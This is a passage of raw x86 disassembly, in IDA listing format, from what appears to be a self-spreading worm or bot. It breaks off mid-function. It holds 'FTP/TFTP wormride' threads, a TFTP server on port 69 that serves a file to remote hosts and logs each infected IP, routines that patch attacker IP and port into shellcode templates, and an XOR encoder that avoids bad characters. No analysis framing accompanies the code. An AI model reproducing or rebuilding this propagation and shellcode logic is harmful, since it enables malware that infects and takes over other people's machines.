sub_411BBC proc near ; CODE XREF: sub_411D59+6�p
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1C8h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov [ebp+var_4], 1
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_8], 1
jmp short loc_411C04
; ---------------------------------------------------------------------------
loc_411BFD: ; CODE XREF: sub_411BBC:loc_411CAB�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_411C04: ; CODE XREF: sub_411BBC+3F�j
cmp [ebp+var_8], 0FFFFh
jnb loc_411CB0
push 0Ah
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call sub_416F7A ; _itoa
add esp, 0Ch
push 0FFFFFFFFh
push 0
lea eax, [ebp+var_18]
push eax
push offset a127_0_0_1 ; "127.0.0.1"
call sub_4050EA
add esp, 10h
mov [ebp+var_1C4], eax
cmp [ebp+var_1C4], 0
jz short loc_411CAB
push [ebp+var_1C4]
call sub_411A09
pop ecx
test eax, eax
jz short loc_411C9F
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
cmp [ebp+var_4], 0
jnz short loc_411C76
push 2
lea eax, [ebp+var_18]
push eax
push [ebp+var_10]
call sub_404871
add esp, 0Ch
jmp short loc_411C9F
; ---------------------------------------------------------------------------
loc_411C76: ; CODE XREF: sub_411BBC+A5�j
push 2
lea eax, [ebp+var_18]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_411C9F
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_411D55
; ---------------------------------------------------------------------------
loc_411C9F: ; CODE XREF: sub_411BBC+98�j
; sub_411BBC+B8�j ...
push [ebp+var_1C4]
call sub_4053B1
pop ecx
loc_411CAB: ; CODE XREF: sub_411BBC+88�j
jmp loc_411BFD
; ---------------------------------------------------------------------------
loc_411CB0: ; CODE XREF: sub_411BBC+4F�j
cmp [ebp+var_10], 0
jnz short loc_411CC9
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_411D55
; ---------------------------------------------------------------------------
loc_411CC9: ; CODE XREF: sub_411BBC+F8�j
mov eax, [ebp+var_1C0]
push dword ptr [eax]
push offset unk_41C6DC
lea eax, [ebp+var_1BC]
push eax
call sub_40D53F
add esp, 0Ch
loc_411CE5: ; CODE XREF: sub_411BBC:loc_411D3C�j
push 3E8h
push [ebp+var_10]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1C8], eax
cmp [ebp+var_1C8], 0
jz short loc_411D2E
cmp [ebp+var_1C8], 0FFFFFFFFh
jz short loc_411D2E
push [ebp+var_1C8]
push offset sub_41113B
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_411D2E
push [ebp+var_1C8]
call sub_4053B1
pop ecx
loc_411D2E: ; CODE XREF: sub_411BBC+145�j
; sub_411BBC+14E�j ...
mov eax, [ebp+var_1C0]
cmp dword ptr [eax+4], 0
jz short loc_411D3C
jmp short loc_411D3E
; ---------------------------------------------------------------------------
loc_411D3C: ; CODE XREF: sub_411BBC+17C�j
jmp short loc_411CE5
; ---------------------------------------------------------------------------
loc_411D3E: ; CODE XREF: sub_411BBC+17E�j
push [ebp+var_10]
call sub_404CBB
pop ecx
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
locret_411D55: ; CODE XREF: sub_411BBC+DE�j
; sub_411BBC+108�j
leave
retn 4
sub_411BBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D59 proc near ; DATA XREF: sub_411D68+4E�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_411BBC
pop ebp
retn 4
sub_411D59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D68 proc near ; CODE XREF: sub_40A9CF+70F�p
; sub_40A9CF+735�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_4042FB
test eax, eax
jz short loc_411D77
jmp short locret_411DC3
; ---------------------------------------------------------------------------
loc_411D77: ; CODE XREF: sub_411D68+B�j
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_411D8D
jmp short locret_411DC3
; ---------------------------------------------------------------------------
loc_411D8D: ; CODE XREF: sub_411D68+21�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aFtpWormrideThr ; "FTP wormride thread"
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_411D59
call sub_4095A4
add esp, 10h
locret_411DC3: ; CODE XREF: sub_411D68+D�j
; sub_411D68+23�j
leave
retn
sub_411D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411DC5 proc near ; DATA XREF: sub_4123F6+43�o
var_DAC = dword ptr -0DACh
var_DA8 = dword ptr -0DA8h
var_DA4 = dword ptr -0DA4h
var_DA0 = byte ptr -0DA0h
var_D9C = dword ptr -0D9Ch
var_D98 = byte ptr -0D98h
var_D94 = dword ptr -0D94h
var_D90 = dword ptr -0D90h
var_D8C = dword ptr -0D8Ch
var_D88 = dword ptr -0D88h
var_D84 = dword ptr -0D84h
var_D80 = byte ptr -0D80h
var_D7C = dword ptr -0D7Ch
var_D70 = byte ptr -0D70h
var_D6F = byte ptr -0D6Fh
var_D6E = byte ptr -0D6Eh
var_D6D = byte ptr -0D6Dh
var_D6C = byte ptr -0D6Ch
var_B6C = dword ptr -0B6Ch
var_B68 = dword ptr -0B68h
var_B64 = dword ptr -0B64h
var_B60 = dword ptr -0B60h
var_B5C = dword ptr -0B5Ch
var_B58 = dword ptr -0B58h
var_358 = dword ptr -358h
var_354 = byte ptr -354h
var_1B0 = word ptr -1B0h
var_1AE = word ptr -1AEh
var_1AC = dword ptr -1ACh
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_19B = byte ptr -19Bh
var_19A = byte ptr -19Ah
var_199 = byte ptr -199h
var_11C = byte ptr -11Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DACh
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_358]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 0
push 2
push 2
call ds:dword_417218 ; socket
mov [ebp+var_108], eax
cmp [ebp+var_108], 0FFFFFFFFh
jnz short loc_411E1D
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411E1D: ; CODE XREF: sub_411DC5+43�j
lea eax, [ebp+var_104]
push eax
call sub_40CF25
push eax
call sub_40449C
pop ecx
pop ecx
push 10h
push 0
lea eax, [ebp+var_1B0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_1B0], 2
push 45h
call ds:dword_417238 ; htons
mov [ebp+var_1AE], ax
lea eax, [ebp+var_104]
push eax
call ds:dword_417244 ; inet_addr
mov [ebp+var_1AC], eax
mov [ebp+var_1A0], 1
push 4
lea eax, [ebp+var_1A0]
push eax
push 4
push 0FFFFh
push [ebp+var_108]
call ds:dword_417204 ; setsockopt
push 10h
lea eax, [ebp+var_1B0]
push eax
push [ebp+var_108]
call ds:dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_411EC2
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411EC2: ; CODE XREF: sub_411DC5+E8�j
push offset aRb ; "rb"
push offset dword_41EB2C
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_10C], eax
cmp [ebp+var_10C], 0
jnz short loc_411F01
push [ebp+var_108]
call ds:dword_417230 ; closesocket
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411F01: ; CODE XREF: sub_411DC5+11B�j
mov eax, [ebp+var_358]
push dword ptr [eax]
push offset unk_41C788
lea eax, [ebp+var_354]
push eax
call sub_40D53F
add esp, 0Ch
push 2
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_10C]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_4], eax
push 0
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push 80h
push 0
lea eax, [ebp+var_19C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_411F66: ; CODE XREF: sub_411DC5:loc_412084�j
; sub_411DC5:loc_4123C6�j
mov [ebp+var_B64], 1
and [ebp+var_B60], 0
and [ebp+var_B5C], 0
loc_411F7E: ; CODE XREF: sub_411DC5+234�j
and [ebp+var_B68], 0
jmp short loc_411F94
; ---------------------------------------------------------------------------
loc_411F87: ; CODE XREF: sub_411DC5:loc_411FB9�j
mov eax, [ebp+var_B68]
inc eax
mov [ebp+var_B68], eax
loc_411F94: ; CODE XREF: sub_411DC5+1C0�j
mov eax, [ebp+var_B68]
cmp eax, [ebp+var_B5C]
jnb short loc_411FBB
mov eax, [ebp+var_B68]
mov eax, [ebp+eax*4+var_B58]
cmp eax, [ebp+var_108]
jnz short loc_411FB9
jmp short loc_411FBB
; ---------------------------------------------------------------------------
loc_411FB9: ; CODE XREF: sub_411DC5+1F0�j
jmp short loc_411F87
; ---------------------------------------------------------------------------
loc_411FBB: ; CODE XREF: sub_411DC5+1DB�j
; sub_411DC5+1F2�j
mov eax, [ebp+var_B68]
cmp eax, [ebp+var_B5C]
jnz short loc_411FF5
cmp [ebp+var_B5C], 200h
jnb short loc_411FF5
mov eax, [ebp+var_B68]
mov ecx, [ebp+var_108]
mov [ebp+eax*4+var_B58], ecx
mov eax, [ebp+var_B5C]
inc eax
mov [ebp+var_B5C], eax
loc_411FF5: ; CODE XREF: sub_411DC5+202�j
; sub_411DC5+20E�j
xor eax, eax
test eax, eax
jnz short loc_411F7E
lea eax, [ebp+var_B64]
push eax
push 0
push 0
lea eax, [ebp+var_B5C]
push eax
push 0
call ds:dword_41722C ; select
test eax, eax
jle loc_4123B8
mov [ebp+var_D84], 10h
mov al, byte_41DE30
mov [ebp+var_D70], al
mov ecx, 80h
xor eax, eax
lea edi, [ebp+var_D6F]
rep stosd
stosw
stosb
lea eax, [ebp+var_D84]
push eax
lea eax, [ebp+var_D80]
push eax
push 0
push 80h
lea eax, [ebp+var_19C]
push eax
push [ebp+var_108]
call ds:dword_417258 ; recvfrom
mov [ebp+var_B6C], eax
cmp [ebp+var_B6C], 0
jz short loc_412084
cmp [ebp+var_B6C], 0FFFFFFFFh
jnz short loc_412089
loc_412084: ; CODE XREF: sub_411DC5+2B4�j
jmp loc_411F66
; ---------------------------------------------------------------------------
loc_412089: ; CODE XREF: sub_411DC5+2BD�j
movsx eax, [ebp+var_19C]
test eax, eax
jnz loc_4121C0
movsx eax, [ebp+var_19B]
cmp eax, 1
jnz loc_4121C0
lea eax, [ebp+var_19C]
mov [ebp+var_D88], eax
lea eax, [ebp+var_19C]
mov [ebp+var_D8C], eax
mov eax, [ebp+var_D88]
inc eax
inc eax
mov [ebp+var_D88], eax
mov eax, [ebp+var_D8C]
inc eax
inc eax
mov [ebp+var_D8C], eax
push [ebp+var_D8C]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_D8C]
lea eax, [ecx+eax+1]
mov [ebp+var_D8C], eax
push offset aOctet ; "octet"
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_D8C]
push offset aOctet ; "octet"
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_41213F
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
push 13h
push offset dword_41C76C
push [ebp+var_108]
call ds:dword_417250 ; sendto
jmp short loc_4121BB
; ---------------------------------------------------------------------------
loc_41213F: ; CODE XREF: sub_411DC5+354�j
push 0
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
and [ebp+var_D70], 0
mov [ebp+var_D6F], 3
and [ebp+var_D6E], 0
mov [ebp+var_D6D], 1
push [ebp+var_10C]
push 200h
push 1
lea eax, [ebp+var_D6C]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_D90], eax
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
mov eax, [ebp+var_D90]
add eax, 4
push eax
lea eax, [ebp+var_D70]
push eax
push [ebp+var_108]
call ds:dword_417250 ; sendto
loc_4121BB: ; CODE XREF: sub_411DC5+378�j
jmp loc_4123B8
; ---------------------------------------------------------------------------
loc_4121C0: ; CODE XREF: sub_411DC5+2CD�j
; sub_411DC5+2DD�j
movsx eax, [ebp+var_19C]
test eax, eax
jnz loc_412396
movsx eax, [ebp+var_19B]
cmp eax, 4
jnz loc_412396
mov al, [ebp+var_19A]
mov [ebp+var_DA0], al
mov al, [ebp+var_199]
mov [ebp+var_D98], al
and [ebp+var_D70], 0
mov [ebp+var_D6F], 3
movzx eax, [ebp+var_D98]
cmp eax, 0FFh
jnz short loc_412242
mov al, [ebp+var_DA0]
add al, 1
mov [ebp+var_DA0], al
mov al, [ebp+var_DA0]
mov [ebp+var_D6E], al
and [ebp+var_D98], 0
mov al, [ebp+var_D98]
mov [ebp+var_D6D], al
jmp short loc_412268
; ---------------------------------------------------------------------------
loc_412242: ; CODE XREF: sub_411DC5+44C�j
mov al, [ebp+var_DA0]
mov [ebp+var_D6E], al
mov al, [ebp+var_D98]
add al, 1
mov [ebp+var_D98], al
mov al, [ebp+var_D98]
mov [ebp+var_D6D], al
loc_412268: ; CODE XREF: sub_411DC5+47B�j
movzx eax, [ebp+var_DA0]
shl eax, 8
movzx ecx, [ebp+var_D98]
lea eax, [eax+ecx-1]
mov [ebp+var_D9C], eax
push 0
mov eax, [ebp+var_D9C]
shl eax, 9
push eax
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_10C]
push 200h
push 1
lea eax, [ebp+var_D6C]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_D94], eax
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
mov eax, [ebp+var_D94]
add eax, 4
push eax
lea eax, [ebp+var_D70]
push eax
push [ebp+var_108]
call ds:dword_417250 ; sendto
cmp [ebp+var_D94], 0
jnz loc_412394
mov eax, [ebp+var_D9C]
shl eax, 9
cmp eax, [ebp+var_4]
jb loc_412394
mov eax, [ebp+var_D7C]
mov [ebp+var_DA8], eax
push [ebp+var_DA8]
push offset dword_41EB10
call sub_409C9D
pop ecx
pop ecx
mov [ebp+var_DA4], eax
mov eax, [ebp+var_DA4]
cmp eax, [ebp+var_DA8]
jz short loc_412394
push 1
push offset dword_41EB14
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_DAC], eax
push 10h
push [ebp+var_D7C]
call ds:dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_11C]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_11C]
push eax
mov eax, [ebp+var_DAC]
inc eax
push eax
push offset aWormride ; "wormride"
push offset unk_41C730
push offset dword_41DAB4
call sub_40D4AB
add esp, 14h
loc_412394: ; CODE XREF: sub_411DC5+52D�j
; sub_411DC5+53F�j ...
jmp short loc_4123B8
; ---------------------------------------------------------------------------
loc_412396: ; CODE XREF: sub_411DC5+404�j
; sub_411DC5+414�j
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
push 9
push offset dword_41C724
push [ebp+var_108]
call ds:dword_417250 ; sendto
loc_4123B8: ; CODE XREF: sub_411DC5+252�j
; sub_411DC5:loc_4121BB�j ...
mov eax, [ebp+var_358]
cmp dword ptr [eax+4], 0
jz short loc_4123C6
jmp short loc_4123CB
; ---------------------------------------------------------------------------
loc_4123C6: ; CODE XREF: sub_411DC5+5FD�j
jmp loc_411F66
; ---------------------------------------------------------------------------
loc_4123CB: ; CODE XREF: sub_411DC5+5FF�j
push [ebp+var_10C]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_108]
call ds:dword_417230 ; closesocket
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
loc_4123F1: ; CODE XREF: sub_411DC5+53�j
; sub_411DC5+F8�j ...
pop edi
leave
retn 4
sub_411DC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4123F6 proc near ; CODE XREF: sub_40A9CF+726�p
; sub_40A9CF+742�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412410
jmp short locret_412446
; ---------------------------------------------------------------------------
loc_412410: ; CODE XREF: sub_4123F6+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aTftpWormrideTh ; "TFTP wormride thread"
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_411DC5
call sub_4095A4
add esp, 10h
locret_412446: ; CODE XREF: sub_4123F6+18�j
leave
retn
sub_4123F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412448 proc near ; CODE XREF: sub_4125DF+88�p
; sub_4125DF+AD�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_41245A
; ---------------------------------------------------------------------------
loc_412453: ; CODE XREF: sub_412448:loc_41249A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_41245A: ; CODE XREF: sub_412448+9�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_41249C
and [ebp+var_8], 0
jmp short loc_41246F
; ---------------------------------------------------------------------------
loc_412468: ; CODE XREF: sub_412448:loc_412498�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_41246F: ; CODE XREF: sub_412448+1E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_C]
jnb short loc_41249A
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_10]
xor eax, ecx
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_412498
push 1
pop eax
jmp short locret_41249E
; ---------------------------------------------------------------------------
loc_412498: ; CODE XREF: sub_412448+49�j
jmp short loc_412468
; ---------------------------------------------------------------------------
loc_41249A: ; CODE XREF: sub_412448+2D�j
jmp short loc_412453
; ---------------------------------------------------------------------------
loc_41249C: ; CODE XREF: sub_412448+18�j
xor eax, eax
locret_41249E: ; CODE XREF: sub_412448+4E�j
leave
retn
sub_412448 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4124A0 proc near ; CODE XREF: sub_4125DF+36�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_4], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
and [ebp+var_C], 0
cmp [ebp+arg_8], 1
jnz short loc_41250C
cmp [ebp+arg_4], 0B2h
jnb short loc_4124CC
xor eax, eax
jmp locret_4125DD
; ---------------------------------------------------------------------------
loc_4124CC: ; CODE XREF: sub_4124A0+23�j
mov [ebp+var_C], 0B2h
push [ebp+var_C]
push offset dword_41C964
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 8Fh
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 88h
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0ACh
mov [ebp+var_8], eax
jmp loc_41259C
; ---------------------------------------------------------------------------
loc_41250C: ; CODE XREF: sub_4124A0+1A�j
cmp [ebp+arg_8], 2
jnz short loc_412554
cmp [ebp+arg_4], 0C6h
jnb short loc_412522
xor eax, eax
jmp locret_4125DD
; ---------------------------------------------------------------------------
loc_412522: ; CODE XREF: sub_4124A0+79�j
mov [ebp+var_C], 0C6h
push [ebp+var_C]
push offset dword_41C89C
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 89h
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0C0h
mov [ebp+var_8], eax
jmp short loc_41259C
; ---------------------------------------------------------------------------
loc_412554: ; CODE XREF: sub_4124A0+70�j
cmp [ebp+arg_4], 0B2h
jnb short loc_412561
xor eax, eax
jmp short locret_4125DD
; ---------------------------------------------------------------------------
loc_412561: ; CODE XREF: sub_4124A0+BB�j
mov [ebp+var_C], 0B2h
push [ebp+var_C]
push offset dword_41C7E8
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 86h
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 8Dh
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0ACh
mov [ebp+var_8], eax
loc_41259C: ; CODE XREF: sub_4124A0+67�j
; sub_4124A0+B2�j
cmp [ebp+var_4], 0
jz short loc_4125B0
push [ebp+arg_C]
call ds:dword_417244 ; inet_addr
mov ecx, [ebp+var_4]
mov [ecx], eax
loc_4125B0: ; CODE XREF: sub_4124A0+100�j
cmp [ebp+var_10], 0
jz short loc_4125CC
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; htons
mov ecx, [ebp+var_10]
mov [ecx], ax
loc_4125CC: ; CODE XREF: sub_4124A0+114�j
cmp [ebp+var_8], 0
jz short loc_4125DA
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_14]
mov [eax], ecx
loc_4125DA: ; CODE XREF: sub_4124A0+130�j
mov eax, [ebp+var_C]
locret_4125DD: ; CODE XREF: sub_4124A0+27�j
; sub_4124A0+7D�j ...
leave
retn
sub_4124A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4125DF proc near ; CODE XREF: sub_410649+8B�p
; .text:00410B93�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 1Ch
cmp [ebp+arg_4], 1Ch
jnb short loc_4125F2
xor eax, eax
jmp locret_41271E
; ---------------------------------------------------------------------------
loc_4125F2: ; CODE XREF: sub_4125DF+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 1Ch
mov [ebp+var_4], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push 1E4h
push [ebp+var_4]
call sub_4124A0
add esp, 18h
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_41262D
xor eax, eax
jmp locret_41271E
; ---------------------------------------------------------------------------
loc_41262D: ; CODE XREF: sub_4125DF+45�j
push 1Ch
push offset loc_41C7C8
push [ebp+var_10]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, dword_41CB98
mov [ebp+var_8], eax
jmp short loc_412659
; ---------------------------------------------------------------------------
loc_412649: ; CODE XREF: sub_4125DF+94�j
; sub_4125DF:loc_41269A�j
call sub_410422
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov dword_41CB98, eax
loc_412659: ; CODE XREF: sub_4125DF+68�j
push 0
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
lea eax, [ebp+var_8]
push eax
call sub_412448
add esp, 14h
test eax, eax
jz short loc_412675
jmp short loc_412649
; ---------------------------------------------------------------------------
loc_412675: ; CODE XREF: sub_4125DF+92�j
mov eax, [ebp+var_14]
xor eax, [ebp+var_8]
mov [ebp+var_1C], eax
push 0
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
lea eax, [ebp+var_1C]
push eax
call sub_412448
add esp, 14h
test eax, eax
jnz short loc_41269A
jmp short loc_41269C
; ---------------------------------------------------------------------------
loc_41269A: ; CODE XREF: sub_4125DF+B7�j
jmp short loc_412649
; ---------------------------------------------------------------------------
loc_41269C: ; CODE XREF: sub_4125DF+B9�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_8]
mov [eax+3], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_1C]
mov [eax+9], ecx
mov al, byte_41CB95
mov byte ptr [ebp+var_C], al
jmp short loc_4126C8
; ---------------------------------------------------------------------------
loc_4126B8: ; CODE XREF: sub_4125DF+104�j
call sub_410461
mov byte ptr [ebp+var_C], al
mov al, byte ptr [ebp+var_C]
mov byte_41CB95, al
loc_4126C8: ; CODE XREF: sub_4125DF+D7�j
push [ebp+var_C]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_14]
push [ebp+var_4]
call sub_412448
add esp, 14h
test eax, eax
jz short loc_4126E5
jmp short loc_4126B8
; ---------------------------------------------------------------------------
loc_4126E5: ; CODE XREF: sub_4125DF+102�j
mov eax, [ebp+var_10]
mov cl, byte ptr [ebp+var_C]
mov [eax+12h], cl
and [ebp+var_18], 0
jmp short loc_4126FB
; ---------------------------------------------------------------------------
loc_4126F4: ; CODE XREF: sub_4125DF+137�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_4126FB: ; CODE XREF: sub_4125DF+113�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_14]
jnb short loc_412718
mov eax, [ebp+var_4]
add eax, [ebp+var_18]
mov al, [eax]
xor al, byte ptr [ebp+var_C]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_18]
mov [ecx], al
jmp short loc_4126F4
; ---------------------------------------------------------------------------
loc_412718: ; CODE XREF: sub_4125DF+122�j
mov eax, [ebp+var_14]
add eax, 1Ch
locret_41271E: ; CODE XREF: sub_4125DF+E�j
; sub_4125DF+49�j
leave
retn
sub_4125DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412720 proc near ; CODE XREF: sub_412A3A+C�p
; sub_412BC9+DF�p ...
var_194 = dword ptr -194h
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_E4 = byte ptr -0E4h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 194h
push 8
push 4
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_194], eax
and [ebp+var_190], 0
loc_412741: ; CODE XREF: sub_412720:loc_41278A�j
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_190]
mov [ebp+ecx+var_10], al
mov eax, [ebp+var_190]
inc eax
mov [ebp+var_190], eax
mov eax, [ebp+var_190]
cmp eax, [ebp+var_194]
jnz short loc_41278A
push offset dword_418620
mov eax, [ebp+var_190]
lea eax, [ebp+eax+var_10]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_41278C
; ---------------------------------------------------------------------------
loc_41278A: ; CODE XREF: sub_412720+4F�j
jmp short loc_412741
; ---------------------------------------------------------------------------
loc_41278C: ; CODE XREF: sub_412720+68�j
push 17Ch
push offset dword_41CA18
lea eax, [ebp+var_18C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push 17Ch
lea eax, [ebp+var_18C]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
leave
retn
sub_412720 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4127D0 proc near ; CODE XREF: sub_412A3A+14D�p
; sub_412BC9+133�p ...
var_24C = byte ptr -24Ch
var_22C = byte ptr -22Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24Ch
cmp dword_41EB1C, 0
jnz loc_4128A0
mov dword_41EB1C, 1
and [ebp+var_20C], 0
jmp short loc_412806
; ---------------------------------------------------------------------------
loc_4127F9: ; CODE XREF: sub_4127D0:loc_41289B�j
mov eax, [ebp+var_20C]
inc eax
mov [ebp+var_20C], eax
